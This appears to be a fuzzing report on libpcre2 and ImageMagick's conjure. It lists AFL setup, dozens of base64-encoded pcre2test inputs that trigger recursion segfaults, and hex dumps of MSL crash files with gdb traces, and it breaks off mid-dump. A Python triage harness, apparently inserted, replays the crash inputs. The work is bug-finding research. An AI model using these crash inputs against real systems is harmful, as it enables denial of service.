libpcre2 fuzzing

Target

URL: svn://vcs.exim.org/pcre2/code/trunk
Relative URL: ^/code/trunk
Repository Root: svn://vcs.exim.org/pcre2
Repository UUID: 6239d852-aaf2-0410-a92c-79f79f948069
Revision: 610
Node Kind: directory
Schedule: normal
Last Changed Author: ph10
Last Changed Rev: 610
Last Changed Date: 2016-11-27 08:14:33 -0800 (Sun, 27 Nov 2016)

Setup source code and results @ https://github.com/alfredfarrugia/libpcre2-fuzzing

Environment

Linux trusty64 3.16.0-55-generic #74~14.04.1-Ubuntu SMP Tue Nov 17 10:15:59 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

setup

cd /tmp
svn co svn://vcs.exim.org/pcre2/code/trunk pcre2
cd pcre2
autoreconf -i
CC=afl-clang-fast CXX=afl-clang-fast++ ./configure --prefix=/opt/fuzzable-pcre2 --enable-debug
make
make install

fuzzing methodology

afl-fuzz -x dict/regex -i input/pcre2test -o /tmp/findings/pcre2test /opt/fuzzable-pcre2/bin/pcre2test

crashing payloads

The crashes found so far are recursion bugs which produce a segmentation fault.

crash reproduction:
	echo "Lyg/Pi4pKhAwGDldKyhKfC0pLwpKfNFden//WzAt0V0rUy3Rf0Q2Xjl6eS16MDCvr68wMK+vr6+vr6+vr68wMH0oYXxiXFthLX16XXswMDYwMDB9Cg==" | base64 -d | bin/pcre2test


Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7b20d94 in match (eptr=, ecode=, mstart=, offset_top=, mb=, eptrb=, rdepth=2) at src/pcre2_match.c:759
759	utf = (mb->poptions & PCRE2_UTF) != 0;

All discovered payloads:

echo "Lyg/Pi4pKhAwGDldKyhKfC0pLwpKfNFden//WzAt0V0rUy3Rf0Q2Xjl6eS16MDCvr68wMK+vr6+vr6+vr68wMH0oYXxiXFthLX16XXswMDYwMDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlswCkp80V1tf/9bMC3RXStTXT8rWzAt0X9ENl45GDldKyhKfC0pLwpKfNFden//WzAt0V0rU10/K1swLdF/RDZeOXp5LXowMK+vr6+vr6+vr68wMH0oYXxiXFthLX16XXswMDYwMDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlswGDldKyhKfC0pLwpKfNFden//Wxwt0V0rU10/K1swLdF/RDZeOXp5LXowMK+vr6+vr6+vr68wL30oYXxiXFthLX16XXswMDYwMDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlswGDldKyhKfC0pLwot0X9ENl45enktejAwr6+vr6+vr6+vrzAwfT9hfGJcW2EtfXpdezAwNjAwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlthFXpdezMsLwo4WzBhfGJcXVxvezAwMDA1MDAwMDAwMFIoYXxiXFuALTMgfSMsfHx8a2tra2tra2tra2tra2tra2tra2tra2t8m3x8fHx8fHx8fHwtel17MDAwNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlthFXpdezMsLwo4WzBhfGJcXVxvezAwMTA1MDAwMDAwMH0oYXxiXFthLTMgfSMsfHx8a2tra2tra2tra2tra2tra2traWtra2t8m3x8fHx8fHx8fHwtel17MDAwNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK1teLV0zMH3KwNfKysdhLXqMcjN8YmkvCmEteiddemEtel1yM9ADS3szIC8yW14tekN7I2B8fAJwcC1dMzB9ysDXysrHYS16jHBwcHCNcHB8YlxbYWF8W2EtMw59Iyx8fHyGbXAt/Q5/Iw18fHx8pnx8inxwcHBwcHBweHBwfHx8fHz/gIhdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK1teLV0zMH3KwNfKysdhLXqMcjN8YlovCmEteiddemEtel1yM9ADS3szIC8yW14tekN7I2B8fAJwcHBwcHCNcHB8YlxbYWF8W2EtMw59Iyx8fHxwW3At/Q5/Iw18fHx8pnx8inxwcHBwcHBwcHBwfHx8XHz/gIhdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK1teLV0zMHAt/Q5/Iw18fHx8pnx8inxwcHBwcHBwcHBwfHx9ysDXysrHYS16jHIzfGJpLwphLXonXXphLXpdcjPQA0t7MyAvMlteLXpDZCNgfHwCcHBwcHBwjXB7fGJcW2FhfFthLTMOfSMsfHx8cFtwLf0OfyMNfHx8fKZ8fIp8cHCDcHBwcHBwcHx8fHx8/4CIXXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "LygxfC4pK1teLV0zMH3KwNfKysdhLXqMcjN8YmkvCmEteiddemEtel1yM9ADS3szIC8yW14tekN7Dn8jDXx8fHymfHyKfHBwcHBwcHBwcHB8fHwjYHx8AnBwcHBwcI1wcHxiXFthYXxbYS0zDn0jLHx8fHBbcC39Dn8jDXx8fHymfHyKfHBwcHBwcHBwcHB8fHx8fP+AiF17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "LyhjP1wxKmE/XFZ8PSkqP3YxKj9cV0MvCksD6G1d/31hLH1ONpNDK1r/f/8iXFthLTMgfSMsfGtra2tra3ybfHx8fHx8fHx8fC16XXswMDA3MDB9Cg==" | base64 -d | bin/pcre2test
echo "LyhjP1wxKmE/XFZ8PSkqP3YxKj9cV0MvCksD6G1d/31hbH1ONpNDK1r/CwtiXFthLTMgfSMs/////2tra3ybfHx8fHx8fHx8fC16XXswMDA3MDB9Cg==" | base64 -d | bin/pcre2test
echo "LyhjP1wxKoI/XFZ8PSkqP3YxKj9cV0MvCksD6G1d/31hLH1ONpNDK1r/CwtiXFthLTMgfSMsfGtra2tra3ybfHx8Xnx8fHx8fC16XXswMDA3MDB9Cg==" | base64 -d | bin/pcre2test
echo "LygufDopKj9cMSpFXFYuLjV7OX0UfGcwMDQwMCg6bGJzJS5sYikvCn0oYXxbYRAzDn0jLHx8fHymfHx8fAJwcHBwcHBwcHB8YlxbYWF8W2EtMw59Iyx8fHx8pnx8fHxwcHBwcHBwcHAt/Q59Iyx8fHx8pnx8fHx8W2EtMw59Iyx8fHx8pnx8fHxwcHBwcHBwcHBwcHBwcHBwcHB8fHx8fP+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "LyiZXStTfC4pK1otP1xSezUsMzB9ykp6P0p6emBdJHzd3WkvCmkthQpKej+ZXStTfC4pK1wtP1z/fzUsMzB9ykp6cHBwcHB8YlxbYWF8W2EtMw59Iyx8fHxwW3At/Q5wcHCScHBwhXAVIHx8fHz/gHpdezAwMDQwMH1I" | base64 -d | bin/pcre2test
echo "LyiZXStTfC4pK1wtP1xSezUsMzB9ykp6P0p6elpdJHzd3WkvCmkthQpKej9KenpgXSR83YBpej9KI2B8fAIgcHBwcHBwcH58YlxbYWF8W2EtMw59Iyx8fHxwW3At/Q5wcHBwcHBmhXBwfHx8fHz/gHpdezAwMDQwMH1I" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKmQtOVlAOV08fIMwel4tLwpbYXx8fHx8fHxeLUMrU14tf/9DeyMsWzAn0V0rW14tekN7I4xffAJwcHBwcHBwcHB9YlxbYWF8W2EtMw59Iyx8fH18pnx8fHxwcHBwcHBwcHAt/Q59Iyx8fKZ8fHx8cHBwcHBwcHBncHx8fHx8/4BhXXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKnx8fHxAOV08fINMel4tLwpbYXx8fHx8fHxeLUMrU14tf/9DeyMsWzAx0V0rW14tekN7I4x8fAJwcHBwcHBwcHB9YlxbYWF8W2EtMw59Iyx8fH18pnx8fHxwcHBwcHBwcHAt/Q59Iyx8fKZ8fHx8cHBwcHBwcHBncHx8fHx8/4BhXXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKig/fC4pKz98gXx8KHEPY3x8fKZ8fHx8cHBwcHBwcHBwLf0OfSMsfHx8fKYpLwopLwooP3suKSo/fIF8fCl6PXsjLFswKdFdK1teLXpDe/9/fHwCcGJwcHBwcHBwfGJcW2FhfFthLTMOfSMsfHx8fHxwcHBwcHBwcHAt/Q59Iyx8fHx8pnx8fHxwfHx8fP+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKyhhfGIpLwp9C2t8Yikvf//t/ywtOXgYZgEZekMrXl4tenpDeyMsWzBL0V0yW14tekN7I2B8fAIgcHBwcHBwcHB8YlxbYWF8W3At/Q59Iw18fHx8pnx8inxwcHBwcHBwhXBwfHx8cHBwcHBwhXBwfHx8fHz/gHpdezAwMDQwMH1I" | base64 -d | bin/pcre2test
echo "LygufGIpKiRcMSoQXFMMXS4KS15ukCtDXStdLwpLXm6QK1tjUXIzfExfLwovCl5qYlxdXHx7YlxbYQ1SDn0jLHx0fHybfHx8fHBwcHBwcHBscHB8fHx8o/+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "LygufGIpKi4+Pj4TKlteLV0vCkp8K3UqfHx8/Hx8ZEMvaWlpCmBhfGJcW2EtMyCHIyx8a2t8/Hx8fC16XXswMDA3MDB9LXpdezAwMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlxSezgsfShKsLCwsLCwsJAOYikvCkr+DQ0gHDAwciP//2JcW2EtMw59Iyx8fGKAel17MDQwNDAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlxSezgsfShKsLCwsLCwsJB8YikvCkr+DQ0gHDAwciNhfGJcW2EtMw59IyxbfCsrKysrKysrKysrKysrKysrKy8rKysrKysrK2KAaF17MDQwNDAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK2kKV1Fyf3xFeS8KLwpeamJcXVx8e2JcW39yKnxFfHyTI9F8fHyFhYWFeS8NUg5SDpMjLHx8fHybfHx8fHBwcHBwcIt8fHyTIyx8fHx8m3x8fAJwcHBwcHCLfHx8fP+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK2kKV1Fyf3xFXC8KLwpeamJcXVx8e2JcW39yKnxFhYWFhYWFhYWFhYWFeS8NUg5SDpMjLHx8fHybfHx8fHBwfHx8fJt8fHx8cHBwcHBwi3x8fJMjLHx8fHybfHx8fP+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "LygufGIpKj9cDSouXFJ7NjJ9Q3x8fHx8fHx8fHx8fHwvbWdpCmD//wqmgF4NDQ0NCQ0NNh+8YpZ8fHx8L21nLFswKdFdK1teLXpDeyN8fHxwcHBweHBwcHBwfGJcW2FhfFthLTMOfXBwcHBwcC39DoEjLHx8fHymfHx8fHBwcHB4cHBwcHB8fHx8fP+Ael17MDAwNDAwfS0=" | base64 -d | bin/pcre2test
echo "LygufGIpKj9cDSouXFJ7NjJ9Q3x8fHx8fHx8fHx8fHwvbWdpCmD//wqmgF4NDQ0NCQ0NNh//CqaAXg0NDQ0JDQ02H7xisbxilnx8fHwvbWcsWzAp0V0rW14tekN7I3x8fAJwcHBwcHBwcHB8YlxbYWF8W2EtMw59cHBwcHBwLf0OfSMsfHx8fKZ8fHx8cHBwcHhwcHBwcHx8fHx8/4B6XXswMDA0MDB9LQ==" | base64 -d | bin/pcre2test
echo "LygufGIpKj9cDSouXFJ7NjJ9Q3xLfHx8fHx8fHx8fHwvbWdpCmD//wqmgF4NDQ0NCQ0NNhy8YpZ8fHx8L21nLFswKdFdK1teLXpDeyN8fHwCcHBwcHBwMHBwfGJcW2FhfFthLTMOfXBwcHBwcC39Dn0jLHx8fHymfHx8fHBwcHB4cHBwcHB8fHN8fP+Ael17MDAwNDAwfS0=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQ/9Hx7MywvCjhbMGF8YlxdXG97MDAwMDUwMDAw//8wfShhfGJcW2EtMyB9Iyx8fHx8m3x8fHx8fHx8fHxKel17MDIwNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQrP/R8ezMsLwo4WzBhfGJcXVxvezAwMDA1MDAwMP/jMIEoYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQrP/R8ezMsLwo4WzBhfGJcXf5vezAwMDA1MDAwMP/eMH0oYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQrP/R8ezMsLwo4WzBhfGJch4eHh4ddXG9pMDAwMDUwMDAw//8wfShhfGJcW2EtMyB9Iyx8fHx8m3x8fHx8fHx8fHwtel17MDIwNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQrP/R8ezMsLwo4WzBhfGJ7XVxvezAwMDA1/zAwMP//MH0oYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKlhOKz/02/Tk9PT0XvT0fGIQLwr1fH0+Xmo1MDAwMP//MHMoYXxiXFtxLTMgfSMsfHx8W5t8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKlxOLwr1fH0+Xmo1MDBEMP//MH0oYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKlxOKz/02/Tk9PT0UfT0fGIQLwr1fH0+Xmo1MDAwMP//En0oYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHydLXpdezAyNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKlxOKz/02/Tk9PT0XvT0fGIQLwr1fH0+Xmo1MDAwMP//MH0oYXxiXFthXXswMjA3MDB9Ag==" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlxwQyv0P1xXezgsfShhfHxiKT8rWytbXi16XS8KWz7ZXS309PT09PT09PT09PT09PT09PT09PT09C16Q3sjfI98AnBwcHBwcHBwcHxiXFthYXxbYS0zDn0jLHx8fGOmfFx8fHBwkyMsfHx8fKZ/fHx8cHBwcHBwcHBwcHx8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "LygufC4pKig/fC4pKj98gXx8KGD/YikvCltPKnpdYmlhfHx8fHyQfFt4Yin//5UvRWF8LilAekN7I2B8fAIgcHBwUnBwcHB8YlxbYWF8W2EjKXx8fHymfHyKfHBwcHBwcHCFL3B8fHx8fP8D6F17MDAwNDAwfUg=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlswoJwnJy19XXszOH0oSnxkKS8KSmRbMDw1MDAeMBwwMIAoYXw2XFthW2EVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFS1wcHBwcHBwcJNwfHx8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygeHj98LjMqKD98Lis/LikqKSsrCkx7Ma+vXa8BezMse6+vXa8BezMse6+v//h7r3x1aS8KK30wf6BpaWkjLFswKdFdMltXV1dXV1dXfHwCIHBwcHBweHBwfGJcW3xbYS0zDn0jLHx8fHJhfFthLTN/fSMsfHx8cFtwLf0rfSMNfHx8fKbDfIp8cHBwcHBwcIVwcHx8fHx8/4B6XXswMDA0MDB9SA==" | base64 -d | bin/pcre2test
echo "LygufGIpKj9c/yo/Li41ezd9A3znJH7uNC8KKKYzJUiP/10vfRt8+Ct/MGkiCoB/MDQ5Wl5egC97I2B8fAJwcHBwcHBwcHB8YlxbYWF8RWEtMw59Iyx8fHxwW3At/Q59Iw18fHx8pnx8inxwcHBwcHBwYWF8W3x8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygufGIpKj9c/yo/Li41ezd9A3znJH7uNC8KKFIzJUiP/10tfRt8+Ct/MGkiCoB/MP85Wl5egC97I2B8fAJwcHBwcHBwcHB8YlxbYWF8W2EgMw59IywF//8FW3At/Q59Iw18fHx8pnx8inxwcHBwcHBwYWF8W3x8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygufGIpKj9c/yo/Li41ezd6A3znJH7uNC8KKFIzJUiP/10vfRt8+Ct/MGkiCoB/MDQ5Wl5egC97I2B8fAJwcHBwcHBwcHB8YlxbYWF8W2EtMw59BCx8fHxwW3At/Q59Iw18fHx8pnx8inxwcHBwcHBwYWF8W3x8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygufGIpKj9c/yo/Li41ezd9A3znJH7uNC8KKFIzJUiP/10vfRt8+Ct/MGkiCoB/MDQ5Wl5eQFB7I2B8fAJwcHBwcHBwj3B8YlxbLnyA/yo/XP8qYWF8W2EtMw59Iyx8fHxwW3gt/Q59Iw18fHx8pnx8inxwcHZycHBwYWF8W3x8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygufGJmZgX//wVmZmZmZikqUVxSK1199+Iwff8FQStdfyt8fT8HkGL/B5Bi/0QKYi8KfXNALH0oYX5iKS8KW2F8fHx/XFthDTMOfXx8cHBwcHBww2xwcHx8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKi5cSCtcSEoeOTyZfGImAWIuEC8KXmp8ciAgICAgK21nQApggF5dXyWYXXsrW14tekN7I4x8fAJwdHBwcHBwcHB9YlxbYWF8W2EtMw59Iyx8fH18pnx8fHxwcHBwcHBwcHAt/Q59Iyx8fKZ8fHx8cGBwcHBwcHBncHx8fHx8/4BhXXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi7/gD8+fC4pKlteLXpDXi1dK1t6LXpde0EsfShKfGIpLwpsf5V6enp6eyNtfHwCcHBwcHBwcHBwfGJcW2FhfFthLTMOfSMsfH//cFtwLf0OfSMNfHx8fKZ8fIp0cHBwcP9wcHBwcIl8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi7/gD8+fC4pKlteLXpDXi1dK1t6LXpdezYsfShKfGIpLwpsf5V6enp6eyNtfHwCWXBwcHBwcHBwfGJcW2FhfGVhLTMOfSMsfHx8cFtwLf0OfSMNfHx8fKZ8fIp+cHBwcP9wcHBwcHx8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi7/gD8+fC4pKlteLXpDXi1dK1t6LXpdxn8sfShKfGIpLwpsf5V6enp6eyNtfHwCcHBwcIZwcHBwfGJcW2FhfFthLSAOfSMsfHx8cFtwLf0OfSMNfHx8fKZ8fIp+cHBwcP9wcHBwcHx8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
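The reproduction lines above are one-shot commands; when re-testing a patched build it is more useful to run the whole list and bucket the results. The harness below is an added example, not code from the report or from the pcre2 project: it pulls the base64 payload out of each `echo "..." | base64 -d | bin/pcre2test` line, feeds the decoded bytes to pcre2test on stdin under a timeout, and buckets each payload by the signal that killed the process (or by exit status / timeout). The PCRE2TEST path, the timeout and the bucket names are this example's own assumptions; the two embedded reproduction lines are copied from the list above as sample input.

```python
"""Triage harness for the pcre2test crash payloads listed in the report (added example)."""
import base64
import re
import signal
import subprocess
from collections import Counter

# Assumed location of the instrumented build from the setup section.
PCRE2TEST = "/opt/fuzzable-pcre2/bin/pcre2test"
TIMEOUT_SECONDS = 10

# Two reproduction lines from the report, embedded as sample input.
REPRO_LINES = """
echo "Lyg/Pi4pKhAwGDldKyhKfC0pLwpKfNFden//WzAt0V0rUy3Rf0Q2Xjl6eS16MDCvr68wMK+vr6+vr6+vr68wMH0oYXxiXFthLX16XXswMDYwMDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlswGDldKyhKfC0pLwot0X9ENl45enktejAwr6+vr6+vr6+vrzAwfT9hfGJcW2EtfXpdezAwNjAwMH0K" | base64 -d | bin/pcre2test
"""

B64_RE = re.compile(r'echo\s+"([A-Za-z0-9+/=]+)"\s*\|\s*base64 -d')


def extract_payloads(text):
    """Decode every `echo "<base64>" | base64 -d ...` line into raw pcre2test input."""
    return [base64.b64decode(m.group(1)) for m in B64_RE.finditer(text)]


def pattern_line(payload):
    """pcre2test input starts with the delimited pattern; the rest are subject lines."""
    return payload.split(b"\n", 1)[0]


def classify(returncode, timed_out):
    """Map a subprocess result to a triage bucket such as SIGSEGV, TIMEOUT or ok."""
    if timed_out:
        return "TIMEOUT"
    if returncode < 0:
        # subprocess reports a signal death as the negated signal number.
        return signal.Signals(-returncode).name
    return "ok" if returncode == 0 else f"exit {returncode}"


def run_one(payload, binary=PCRE2TEST, timeout=TIMEOUT_SECONDS):
    """Run one payload through pcre2test and return its bucket."""
    try:
        proc = subprocess.run([binary], input=payload, capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return classify(None, True)
    except FileNotFoundError:
        return "NO_BINARY"
    return classify(proc.returncode, False)


def triage(text, binary=PCRE2TEST):
    """Bucket every payload found in `text`; returns a Counter of bucket -> count."""
    buckets = Counter()
    for payload in extract_payloads(text):
        bucket = run_one(payload, binary)
        buckets[bucket] += 1
        print(f"{bucket:10s} {pattern_line(payload)[:60]!r}")
    return buckets


if __name__ == "__main__":
    print(triage(REPRO_LINES))
```

Because the report attributes the crashes to recursion, whether a given payload actually faults depends on the stack limit of the process; run the triage with the same `ulimit -s` as the fuzzing box, otherwise a payload can move between the SIGSEGV and ok buckets without any change in pcre2.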

fuzz testing imagemagick conjure

version

Version: ImageMagick 7.0.3-5 Q16 x86_64 2016-11-02 http://www.imagemagick.org
Copyright: Copyright (C) 1999-2016 ImageMagick Studio LLC
License: http://www.imagemagick.org/script/license.php
Features: Cipher DPC HDRI
Delegates (built-in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma openexr png tiff webp wmf x xml zlib

system

dist: Ubuntu 16.04 xenial
linux_distribution: Ubuntu 16.04 xenial
system: Linux
machine: x86_64
platform: Linux-4.4.0-43-generic-x86_64-with-Ubuntu-16.04-xenial
uname: Linux ubuntu-xenial 4.4.0-43-generic #63-Ubuntu SMP Wed Oct 12 13:48:03 UTC 2016 x86_64 x86_64
version: #63-Ubuntu SMP Wed Oct 12 13:48:03 UTC 2016

command

conjure -dimensions 10x10 <filename>

Summary report

SIGSEGV, Segmentation fault: 6

filename: id:000000,sig:06,src:000000,op:havoc,rep:4

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |ad filename="ima|
0050  67 65 2E 62 61 73 65 2D 68 65 69 67 68 74 5D 20  |ge.base-height] |
0060  74 6F 20 25 5B 77 69 64 74 67 69 66 22 20 2F 3E  |to %[widtgif" />|
0070  3C 67 65 74 20 77 3D 22 62 61 74 22 20 2F 3E 3C  |<get w="bat" /><|
0080  72 65 73 69 7A 65 20 67 65 6F 6D 65 74 72 79 3D  |resize geometry=|
0090  22 56 56 56 56 56 56 56 56 56 56 56 56 56 20 77  |"VVVVVVVVVVVVV w|
00A0  69 64 74 68 3D 22 77 69 64 74 68 22 20 68 65 69  |idth="width" hei|
00B0  67 68 74 3D 22 68 65 69 67 68 20 2F 3E 3C 70 72  |ght="heigh /><pr|
00C0  69 6E 74 20 6F 75 74 70 75 74 3D 22 7A 65 64 20  |int output="zed |
00D0  66 72 6F 6D 20 25 5B 62 61 73 65 2D 77 69 64 74  |from %[base-widt|
00E0  68 5D 78 25 5B 62 61 73 65 2D 68 65 69 67 68 74  |h]x%[base-height|
00F0  5D 20 74 6F 20 25 5B 77 69 64 74 68 5D 78 25 5B  |] to %[width]x%[|
0100  68 65 69 67 68 74 5D 2E 5C 6E 22 20 2F 3E 3C 77  |height].\n" /><w|
0110  72 69 74 65 20 66 69 6C 65 6E 50 6D 65 3D 22 69  |rite filenPme="i|
0120  6D 61 67 65 2E 70 6E 67 22 20 2F 3E 3C 2F 69 6D  |mage.png" /></im|
0130  61 67 65 3E 0A -- -- -- -- -- -- -- -- -- -- --  |age>.           |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000000,sig:06,src:000000,op:havoc,rep:4", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000001,sig:06,src:000000,op:havoc,rep:4

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 20 66 69  |ad filename=" fi|
0050  6C 65 6E 61 69 6E 67 2D 77 69 64 74 68 5D 78 25  |lenaing-width]x%|
0060  5B 62 61 73 74 22 20 2F 3E 3C 72 65 73 69 7A 65  |[bast" /><resize|
0070  20 67 65 6F 6D 65 74 72 79 3D 22 25 5B 64 69 6D  | geometry="%[dim|
0080  22 20 2F 3E 3C 67 65 74 20 77 69 64 74 68 3D 22  |" /><get width="|
0090  77 69 64 74 68 22 20 68 65 69 67 68 74 3D 22 68  |width" height="h|
00A0  65 69 67 68 74 22 20 2F 3E 3C 70 72 69 6E 74 20  |eight" /><print |
00B0  6F 75 74 70 75 74 3D 22 7A 65 64 20 66 72 6F 65  |output="zed froe|
00C0  6E 63 6F 64 69 6E 67 2D 77 69 64 74 68 5D 78 25  |ncoding-width]x%|
00D0  5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20 74 6F  |[base-height] to|
00E0  80 00 00 00 69 64 74 68 5D 78 25 5B 68 65 69 67  |....idth]x%[heig|
00F0  68 74 5D 2E 5C 6E 22 20 2F 3E 3C 77 72 69 74 65  |ht].\n" /><write|
0100  20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61 67 65  | filename="image|
0110  2E 70 6E 67 22 20 2F 3E 3C 2F 69 6D 61 67 65 3E  |.png" /></image>|
0120  0A -- -- -- -- -- -- -- -- -- -- -- -- -- -- --  |.               |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000001,sig:06,src:000000,op:havoc,rep:4", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000002,sig:06,src:000000,op:havoc,rep:2

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |ad filename="ima|
0050  67 25 5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20  |g%[base-height] |
0060  74 6F 20 25 5B 77 69 64 74 68 5D 78 25 5B 65 2E  |to %[width]x%[e.|
0070  67 69 66 22 20 2F 3E 3C 67 65 74 20 77 3D 22 62  |gif" /><get w="b|
0080  61 74 22 20 2F 3E 3C 72 65 73 69 7A 65 20 67 65  |at" /><resize ge|
0090  6F 6D 65 74 72 79 3D 22 25 5B 64 69 6D 22 20 22  |ometry="%[dim" "|
00A0  68 65 69 67 68 74 22 20 2F 3E 3C 70 72 69 6E 74  |height" /><print|
00B0  20 6F 75 74 70 75 74 3D 22 7A 65 64 20 66 72 6F  | output="zed fro|
00C0  6D 20 25 5B 62 61 73 65 2D 77 69 64 74 68 5D 78  |m %[base-width]x|
00D0  25 5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20 74  |%[base-height] t|
00E0  6F 20 25 5B 77 69 64 74 68 5D 78 25 5B 68 65 69  |o %[width]x%[hei|
00F0  67 68 74 5D 2E 5C 6E 22 20 2F 3E 3C 77 72 69 74  |ght].\n" /><writ|
0100  65 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61 67  |e filename="imag|
0110  65 2E 70 6E 67 22 20 2F 3E 3C 2F 69 6D 61 67 65  |e.png" /></image|
0120  3E 0A -- -- -- -- -- -- -- -- -- -- -- -- -- --  |>.              |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000002,sig:06,src:000000,op:havoc,rep:2", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000003,sig:06,src:000000,op:havoc,rep:4

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
